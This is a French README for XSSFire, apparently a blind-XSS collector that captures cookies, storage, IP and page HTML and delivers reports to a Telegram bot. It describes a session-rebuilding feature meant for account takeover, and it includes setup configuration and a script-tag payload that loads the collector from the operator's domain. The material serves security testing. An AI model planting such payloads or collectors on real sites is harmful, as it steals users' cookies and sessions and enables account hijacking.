Le script est une combinaison de PHP et JavaScript. Il capture les données à l'aide de JS et les envoie au script lui-même, puis il génère des fichiers de rapport et les livre via Telegram.
Prérequis :
Serveur web fonctionnant sous Linux avec un domaine et un certificat SSL.
Compte Telegram (pour recevoir les rapports BXSS)
Pourquoi Telegram ?
Facile à configurer.
Rapide.
Accessible.
Fonctionnalités :
Capture : IP, User-Agent, Date-Heure, Local Storage, Session Storage, Cookies, Referrer, Origin, URL, HTML, si déclenché depuis une iframe
Constructeur de session : un JavaScript qui peut reconstruire la session, ouvrir l'URL capturée et les outils de développement, puis le coller dans la console et appuyer sur Entrée. Si vous avez de la chance, vous pouvez prendre le contrôle de la session.
Notifications Telegram : plus rapides et plus faciles à configurer que les e-mails et plus accessibles.
Anti-spam : vous ne devriez recevoir qu'une ou deux notifications pour chaque URL capturée. Cependant, le script se réinitialise de temps en temps pour vous notifier à nouveau plus tard.
Chiffrement : vous pouvez définir un mot de passe dans le script et le rapport que vous recevez sur Telegram sera un fichier zip protégé par un mot de passe. (Les bots Telegram n'utilisent pas le chiffrement de bout en bout).
Instantané HTML : c'est un fichier HTML qui sera livré avec le rapport, il devrait ressembler à la page de votre cible.
Écrivez /start dans le chat et créez un nouveau bot.
Vous devriez recevoir votre jeton de bot lorsque vous le créez.
Conservez le jeton de côté.
Allez maintenant dans le chat de votre bot nouvellement créé, démarrez-le puis dites bonjour.
Ensuite, allez sur : https://api.telegram.org/bot<bot_token>/getUpdates
Et enregistrez votre identifiant de chat.
Ouvrez le script XSSFire et modifiez les lignes suivantes :
root@kitploit:~
$chat_id = "<Telegram Chat ID>"; // Your Telegram Chat ID
$token = "<Telegram Bot Access Token>"; // Your telegram Bot Access token
$password = False; //Protect the Blind XSS Report with a password. Leave as False if not used.
Téléversez le script sur votre serveur.
Pour générer des payloads, vous pouvez envisager d'utiliser le Blind-XSS-Manager https://github.com/SeifElsallamy/Blind-XSS-Manager.
Vous pouvez simplement créer des payloads via cette extension en saisissant yourdomain.com/
Remarque : vous pouvez changer le nom du fichier en index.php et le téléverser dans le répertoire principal de votre serveur pour raccourcir les payloads, le payload devrait alors ressembler à ceci <script src="https://yourdomain.com"></script>.